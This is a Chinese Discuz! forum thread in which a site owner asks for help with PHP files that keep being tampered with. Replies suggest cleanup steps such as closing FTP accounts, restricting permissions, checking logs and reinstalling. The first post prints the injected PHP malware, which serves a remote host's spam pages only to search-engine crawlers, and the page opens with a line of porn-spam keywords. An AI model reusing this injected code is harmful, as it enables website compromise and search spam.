97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標(biāo)題: 網(wǎng)站文件被篡改 [打印本頁]

作者: 9axl 時(shí)間: 2020-9-25 08:16
標(biāo)題: 網(wǎng)站文件被篡改
網(wǎng)站forum.phhp\index.php\portal.php三個(gè)文件總被篡改，刪除了很快就又被改了。在文件最開始加這樣一段內(nèi)容：
<?phpheader('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false||strpos($key,strtolower('Yahoo'))!== false||strpos($key,strtolower('bingbot'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www.hack163.com/shou/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}

?>
請(qǐng)問怎么處理？site域名后，出來的很多亂七八糟的內(nèi)容，但點(diǎn)擊后跳轉(zhuǎn)的還是我的網(wǎng)站。外行頭疼中。

作者: 一定 時(shí)間: 2020-9-25 10:15
FTP泄漏還是什么？我一般用完FTP都關(guān)閉賬號(hào)。

作者: 9axl 時(shí)間: 2020-9-25 13:06
刪除了過一會(huì)就又被篡改了。

作者: ditd2 時(shí)間: 2020-9-25 13:08
刪除后，關(guān)閉文件夾權(quán)限。

作者: 9axl 時(shí)間: 2020-9-25 13:16

ditd2 發(fā)表于 2020-9-25 13:08
刪除后，關(guān)閉文件夾權(quán)限。

謝謝指點(diǎn)。

作者: 好佳芯科技 時(shí)間: 2020-9-25 15:44

9axl 發(fā)表于 2020-9-25 13:16
謝謝指點(diǎn)。

可以協(xié)助清楚木馬276440802

作者: crx349 時(shí)間: 2020-9-25 16:42

9axl 發(fā)表于 2020-9-25 13:06
刪除了過一會(huì)就又被篡改了。

一般是被掛馬了盡快清理木馬

作者: Failure 時(shí)間: 2020-9-25 18:54
后門都沒去掉，刪掉相關(guān)代碼是沒用的

作者: 470342341 時(shí)間: 2020-9-29 13:33
我的前幾天也是種了類似木馬惡心死我了

作者: 9axl 時(shí)間: 2020-9-29 13:37

470342341 發(fā)表于 2020-9-29 13:33
我的前幾天也是種了類似木馬惡心死我了

請(qǐng)教現(xiàn)在怎么處理的？

作者: lookboy 時(shí)間: 2020-9-30 03:26
現(xiàn)在網(wǎng)站被掛馬千奇百怪，我算是什么都經(jīng)歷了
甚至人家都可以利用圖片上傳功能上傳病毒代碼
其實(shí)他不會(huì)破壞你的論壇，無非就是想首頁跳轉(zhuǎn)到垃圾網(wǎng)站
對(duì)于我們這些小白來說，頭疼的恨
如果你真想徹底解決這個(gè)問題
我個(gè)人推薦你使用殺毒軟件 ESET file security
雖然他三年版要小兩千元
但是基本算是一勞永逸了
安裝后你會(huì)發(fā)現(xiàn)有很多人不停的掃描的你的網(wǎng)站漏洞
一個(gè)月有幾千條攻擊信息，想想可怕不

作者: s36376149 時(shí)間: 2020-10-2 21:46

470342341 發(fā)表于 2020-9-29 13:33
我的前幾天也是種了類似木馬惡心死我了

請(qǐng)教!我現(xiàn)在有臺(tái)香港服務(wù)器也是一樣!中馬了!什么記錄都查不到!都刪除掉了!不知道從哪里查起了!

作者: crx349 時(shí)間: 2020-10-3 11:53

s36376149 發(fā)表于 2020-10-2 21:46
請(qǐng)教!我現(xiàn)在有臺(tái)香港服務(wù)器也是一樣!中馬了!什么記錄都查不到!都刪除掉了!不知道從哪里查起了! ...

檢查日志排查啊

作者: s36376149 時(shí)間: 2020-10-3 19:47

crx349 發(fā)表于 2020-10-3 11:53
檢查日志排查啊

日志也被清空了！

作者: crx349 時(shí)間: 2020-10-3 23:53

s36376149 發(fā)表于 2020-10-3 19:47
日志也被清空了！

一般這種情況建議備份重裝系統(tǒng)了

作者: allthebest 時(shí)間: 2020-10-4 19:43
1、若存在，處理前，先卸載所有盜版插件與模版。

2、掛馬問題解決了后，記得更改服務(wù)器相關(guān)的各種密碼，盡量設(shè)置的復(fù)雜一點(diǎn)。

作者: s36376149 時(shí)間: 2020-10-4 19:50

crx349 發(fā)表于 2020-10-3 23:53
一般這種情況建議備份重裝系統(tǒng)了

我也是有這個(gè)想法！！

歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/)